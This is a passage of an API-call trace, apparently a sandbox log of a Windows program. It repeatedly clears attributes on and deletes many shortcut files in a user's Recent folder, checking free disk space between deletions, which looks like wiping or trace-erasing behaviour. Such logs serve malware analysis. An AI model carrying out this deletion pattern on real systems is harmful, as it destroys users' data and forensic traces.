HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lHvtd.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lhvtd.lnk")) returned 1 [0150.523] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.528] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mb7F.flv.lnk", dwFileAttributes=0x80) returned 1 [0150.529] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mb7F.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\mb7f.flv.lnk")) returned 1 [0150.531] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.537] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mD6f.lnk", dwFileAttributes=0x80) returned 1 [0150.537] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mD6f.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\md6f.lnk")) returned 1 [0150.540] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.546] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MHSnIf00DQKvE2e u0UQ.lnk", dwFileAttributes=0x80) returned 1 [0150.546] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MHSnIf00DQKvE2e u0UQ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\mhsnif00dqkve2e u0uq.lnk")) returned 1 [0150.549] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.554] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\moW9-Sh.lnk", dwFileAttributes=0x80) returned 1 [0150.555] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\moW9-Sh.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\mow9-sh.lnk")) returned 1 [0150.557] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.563] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Music.lnk", dwFileAttributes=0x80) returned 1 [0150.563] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Music.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my music.lnk")) returned 1 [0150.566] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.571] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Pictures.lnk", dwFileAttributes=0x80) returned 1 [0150.571] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Pictures.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my pictures.lnk")) returned 1 [0150.574] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.580] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Videos.lnk", dwFileAttributes=0x80) returned 1 [0150.580] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Videos.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my videos.lnk")) returned 1 [0150.583] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.588] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\N1Em Aiw.ots.lnk", dwFileAttributes=0x80) returned 1 [0150.589] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\N1Em Aiw.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\n1em aiw.ots.lnk")) returned 1 [0150.595] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.600] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\n8gStSx.flv.lnk", dwFileAttributes=0x80) returned 1 [0150.600] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\n8gStSx.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\n8gstsx.flv.lnk")) returned 1 [0150.603] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.609] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NMtpO.ots.lnk", dwFileAttributes=0x80) returned 1 [0150.609] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NMtpO.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\nmtpo.ots.lnk")) returned 1 [0150.612] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.617] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\nrPFY_cIHQOH8qunbM.lnk", dwFileAttributes=0x80) returned 1 [0150.617] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\nrPFY_cIHQOH8qunbM.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\nrpfy_cihqoh8qunbm.lnk")) returned 1 [0150.620] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.651] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\O7LAHcxv7ZC607av8Yb.mkv.lnk", dwFileAttributes=0x80) returned 1 [0150.652] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\O7LAHcxv7ZC607av8Yb.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\o7lahcxv7zc607av8yb.mkv.lnk")) returned 1 [0150.655] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.660] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OoUT0wT8J.lnk", dwFileAttributes=0x80) returned 1 [0150.660] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OoUT0wT8J.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oout0wt8j.lnk")) returned 1 [0150.663] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.668] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\o_wR3dUeIME.lnk", dwFileAttributes=0x80) returned 1 [0150.669] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\o_wR3dUeIME.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\o_wr3dueime.lnk")) returned 1 [0150.671] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.677] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\p0baPrKWZ29RuwFH.lnk", dwFileAttributes=0x80) returned 1 [0150.677] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\p0baPrKWZ29RuwFH.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\p0baprkwz29ruwfh.lnk")) returned 1 [0150.680] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.685] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\p7umu3_O9Pn5HB.lnk", dwFileAttributes=0x80) returned 1 [0150.685] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\p7umu3_O9Pn5HB.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\p7umu3_o9pn5hb.lnk")) returned 1 [0150.688] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.694] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\p8e7lyeG.lnk", dwFileAttributes=0x80) returned 1 [0150.694] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\p8e7lyeG.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\p8e7lyeg.lnk")) returned 1 [0150.697] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.703] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\pn60s76nVNO-0wgoW8c.flv.lnk", dwFileAttributes=0x80) returned 1 [0150.703] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\pn60s76nVNO-0wgoW8c.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\pn60s76nvno-0wgow8c.flv.lnk")) returned 1 [0150.706] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.711] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PNwZ6I8E1zau.lnk", dwFileAttributes=0x80) returned 1 [0150.711] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PNwZ6I8E1zau.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\pnwz6i8e1zau.lnk")) returned 1 [0150.714] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.719] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PpaypRFbyCiXvD.lnk", dwFileAttributes=0x80) returned 1 [0150.719] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PpaypRFbyCiXvD.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ppayprfbycixvd.lnk")) returned 1 [0150.722] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.728] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\q3ipqyOpRy.lnk", dwFileAttributes=0x80) returned 1 [0150.728] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\q3ipqyOpRy.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\q3ipqyopry.lnk")) returned 1 [0150.740] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.745] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\QhF6zQm_Bxo0V709cZ3G.lnk", dwFileAttributes=0x80) returned 1 [0150.747] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\QhF6zQm_Bxo0V709cZ3G.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qhf6zqm_bxo0v709cz3g.lnk")) returned 1 [0150.750] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.755] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qjeVgCnxSo6JNI iG.lnk", dwFileAttributes=0x80) returned 1 [0150.755] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qjeVgCnxSo6JNI iG.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qjevgcnxso6jni ig.lnk")) returned 1 [0150.758] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.763] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\QnhVGbT.lnk", dwFileAttributes=0x80) returned 1 [0150.764] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\QnhVGbT.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qnhvgbt.lnk")) returned 1 [0150.767] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.772] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qysC7D.lnk", dwFileAttributes=0x80) returned 1 [0150.773] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qysC7D.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qysc7d.lnk")) returned 1 [0150.776] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.781] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RK-_xAsiLu.lnk", dwFileAttributes=0x80) returned 1 [0150.781] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RK-_xAsiLu.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\rk-_xasilu.lnk")) returned 1 [0150.784] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.789] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk", dwFileAttributes=0x80) returned 1 [0150.789] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\roaming.lnk")) returned 1 [0150.792] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.797] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rWXSgpTKpir07i_.lnk", dwFileAttributes=0x80) returned 1 [0150.798] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rWXSgpTKpir07i_.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\rwxsgptkpir07i_.lnk")) returned 1 [0150.800] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.805] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RZs9K32XCBkLrlBW.lnk", dwFileAttributes=0x80) returned 1 [0150.806] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RZs9K32XCBkLrlBW.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\rzs9k32xcbklrlbw.lnk")) returned 1 [0150.808] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.814] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s0HIrW0y_Rv2.lnk", dwFileAttributes=0x80) returned 1 [0150.814] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s0HIrW0y_Rv2.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\s0hirw0y_rv2.lnk")) returned 1 [0150.817] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.821] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\spD83P9ISqa.lnk", dwFileAttributes=0x80) returned 1 [0150.822] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\spD83P9ISqa.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\spd83p9isqa.lnk")) returned 1 [0150.825] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.831] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T-M0cw7373T592.mkv.lnk", dwFileAttributes=0x80) returned 1 [0150.831] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T-M0cw7373T592.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t-m0cw7373t592.mkv.lnk")) returned 1 [0150.834] 